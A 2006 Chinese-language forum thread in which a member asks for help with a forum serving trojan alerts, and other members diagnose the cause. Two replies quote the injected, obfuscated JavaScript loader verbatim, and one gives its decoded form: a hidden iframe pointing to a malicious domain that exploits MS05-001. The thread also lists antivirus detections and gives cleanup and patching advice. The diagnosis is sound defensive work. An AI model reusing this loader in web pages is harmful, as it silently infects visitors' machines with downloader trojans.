【求助】論壇被植入木馬病毒

第 1 頁,共 3 頁 1 2 3 末頁末頁
顯示結果從第 1 筆 到 10 筆,共計 25 筆
  1. #1
    會員 eva671117 的大頭照
    註冊日期
    2006-01-20
    所在地區
    ADSL 2M/256
    討論區文章
    8

    【求助】論壇被植入木馬病毒

    朋友最近碰上了一個大難題

    從7/18就有會員反應一進入論壇,防毒程式就會出現有木馬病毒的警示..

    但是調查後發現,大部分會員都是很正常..沒偵測到病毒!

    不過還是有很多人會有這種情形

    檔案名稱:http://www.shuaidd.com/script/src/ad001.res
    病毒種類:變種的 Win32/TrojanDownloader.Delf.YM 木馬

    有時進論壇..還會跳出一個"說明"的視窗..隨後那個視窗消失

    有時還會自動關閉IE..一直找不出原因...

    7/22刪除所有論壇的程式,然後重新架設還是一樣!

    這兩天跟主機商連絡,他們也說主機線路沒問題..

    請問有沒有經驗高手曾經碰過?

    請大家幫幫忙!

    謝謝大家喔!


    此文章於 2006-08-02 07:41 PM 被 eva671117 編輯。

  2. #2
    會員 eva671117 的大頭照
    註冊日期
    2006-01-20
    所在地區
    ADSL 2M/256
    討論區文章
    8

    回覆: 【求助】論壇被植入木馬病毒

    瀏覽時警告視窗不斷的跳出



    小妹用的是自行購買
    經合法授權的費爾托斯特安全ESD下載版
    另外還有用卡巴斯基,不過沒反應

  3. #3
    underwater
    註冊日期
    2005-01-31
    所在地區
     
    討論區文章
    73

    回覆: 【求助】論壇被植入木馬病毒

    問題好像是這個? 可是一堆亂七八糟,不知道是什麼東西。
    var HtmlStrings=["=jgsbnf!tsd>iuuq;00xxx/tivbjee/dpn0tdsjqu0bedpvou/ep@to>be112!xj","eui>1!ifjhiu>1>=0jgsbnf>"];function jspsw(st){var varS;varS="";var i; for(var a=0;a<st.length;a++){i = st.charCodeAt(a);if (i==1)varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if(i==2) { a++;varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1);} return varS;}var thejsnum=2;function thejsS(){for(i=0;i<thejsnum;i++)document.write(jspsw(HtmlStrings[i]));}thejsS();

    試過了,只要 body 內有上面那堆,就會連到
    ttp://www.shuaidd.com/script/adcount.do?sn=ad001
    AntiVir         07.21.2006  EXP/VBS.Phel.BW.1
    ClamAV        07.21.2006  Exploit.MS05-001.gen
    eTrust-Vet      07.21.2006  HTML/HelpControl!exploit
    Ewido          07.22.2006  Downloader.Agent.ah

    然後 ttp://www.shuaidd.com/script/src/ad001.do
    ClamAV        07.21.2006  Trojan.Downloader.VBS.Phel.H
    Ewido          07.22.2006  Not-A-Virus.Exploit.VBS.Phel.bs
    Fortinet        07.22.2006  VBS/Phel.H!tr.dldr

    再來 ttp://www.shuaidd.com/script/src/ad001.res
    AntiVir         07.22.2006  HEUR/Malware.FKMI
    BitDefender     07.22.2006  Trojan.Downloader.VA
    DrWeb        07.22.2006   DLOADER.Trojan
    NOD32v2      07.22.2006   a variant of Win32/TrojanDownloader.Delf.YM
    Panda         07.22.2006  Suspicious file
    Symantec      07.22.2006  Downloader
    TheHacker      07.21.2006  Posible_Worm32
    VBA32         07.21.2006  suspected of Trojan-Downloader.Delf.6

    (By VirusTotal.com, 未列出的廠商代表沒有偵測到)

    可是對我的電腦好像沒影響的樣子,不知道是洞補好了還是我沒發覺。
    管理員好像緊急關站了,但是關鍵的那幾行還丟在那裡,難道是關好玩的?
    題外話。McAfee 又槓龜了,上次試了新家用版的 BETA,實在覺得不好用。

  4. #4
    會員 eva671117 的大頭照
    註冊日期
    2006-01-20
    所在地區
    ADSL 2M/256
    討論區文章
    8

    回覆: 【求助】論壇被植入木馬病毒

    不好意思喔
    昨晚我累到睡著了
    而一早起來時
    他說因為他一直找不到原因
    所以半夜時只好還原到7月初的備份
    但這也只是暫時的解決辦法
    很謝謝您
    我會請他再作測試看看的^^

  5. #5
    長期威脅研究經驗
    註冊日期
    2005-08-23
    所在地區
    ADSL 12M/1M
    討論區文章
    1,074

    回覆: 【求助】論壇被植入木馬病毒

    用KIS 6開啟檔案都沒反應.. ...(功能都調到最強了.. )



  6. #6
    長期威脅研究經驗
    註冊日期
    2005-08-23
    所在地區
    ADSL 12M/1M
    討論區文章
    1,074

    回覆: 【求助】論壇被植入木馬病毒

    請問一下...關於這種問題,該怎麼回報給Kaspersky啊...

    這麼多重的威脅...難啊..

  7. #7
    會員
    註冊日期
    2006-07-04
    所在地區
     
    討論區文章
    116

    回覆: 【求助】論壇被植入木馬病毒

    網頁有一段被加密了的代碼:
    語法:
    var HtmlStrings=["=jgsbnf!tsd>iuuq;00xxx/tivbjee/dpn0tdsjqu0bedpvou/ep@to>be112!xj","eui>1!ifjhiu>1>=0jgsbnf>"];function jspsw(st){var varS;varS="";var i; for(var a=0;a<st.length;a++){i = st.charCodeAt(a);if (i==1)varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if(i==2) { a++;varS+=String.fromCharCode(st.charCodeAt(a)); } else  varS+=String.fromCharCode(i-1);} return varS;}var thejsnum=2;function thejsS(){for(i=0;i<thejsnum;i++)document.write(jspsw(HtmlStrings[i]));}thejsS();
    代碼解密後:
    語法:
    <BODY><IFRAME src="http://www.shuaidd.com/script/adcount.do?sn=ad001" width=0 height=0></IFRAME></BODY>
    上面的鏈接會連接到一個利用MS05-001漏洞運行exe文件的網頁,這也是爲什麽會出現幫助窗口的原因.

    清除網頁中惡意代碼很簡單,搜索"var HtmlStrings=",刪除相關代碼.
    但最重要的是馬上找出論壇被入侵的原因.

  8. #8
    會員
    註冊日期
    2006-07-04
    所在地區
     
    討論區文章
    116

    回覆: 【求助】論壇被植入木馬病毒

    引用 作者:esjustin
    請問一下...關於這種問題,該怎麼回報給Kaspersky啊...

    這麼多重的威脅...難啊..
    打上相關漏洞補丁或使用非ie內核的浏覽器,都可以有效地避免中毒.

  9. #9
    長期威脅研究經驗
    註冊日期
    2005-08-23
    所在地區
    ADSL 12M/1M
    討論區文章
    1,074

    回覆: 【求助】論壇被植入木馬病毒

    引用 作者:hwwgo
    打上相關漏洞補丁或使用非ie內核的浏覽器,都可以有效地避免中毒.
    好像不用ie真的有效,在下用FF,所以都沒發現威脅

  10. #10
    會員 eva671117 的大頭照
    註冊日期
    2006-01-20
    所在地區
    ADSL 2M/256
    討論區文章
    8

    回覆: 【求助】論壇被植入木馬病毒

    他說好像真的是那一組代碼的問題耶..
    他早上弄好之後就沒查到病毒
    但是中午後又有了..
    後來把所有檔案下載回來檢查
    那段代碼不存在檔案內
    但是一旦用ie檢視原檔
    就會出現
    所以程式上傳覆蓋也沒用
    該檔案下載回來沒有那一段
    上網檢視原檔會出現那段代碼
    那個病毒好像不會存在硬碟
    偵測時殺不掉也找不到
    後來防毒軟體(NOD32)說在記憶體
    後來拔掉記憶體重插
    病毒就沒有了



第 1 頁,共 3 頁 1 2 3 末頁末頁

類似的主題

  1. 手機王又被植入木馬了
    作者:hcchen 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 11
    最後發表: 2006-10-29, 06:25 PM
  2. 【警告】Sogi! 手機王--被植入木馬
    作者:hcchen 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 9
    最後發表: 2006-10-29, 11:45 AM
  3. 這網站是不是被植入木馬了啊>.<
    作者:消防小天使 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2005-06-19, 10:25 PM
  4. 【轉貼】Sendmail可能被植入木馬程式!
    作者:nyker 所在討論版:-- 網 路 技 術 版
    回覆: 0
    最後發表: 2002-11-02, 07:27 PM
  5. 這是被植入木馬嗎?
    作者:chiener 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2002-04-23, 04:23 PM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •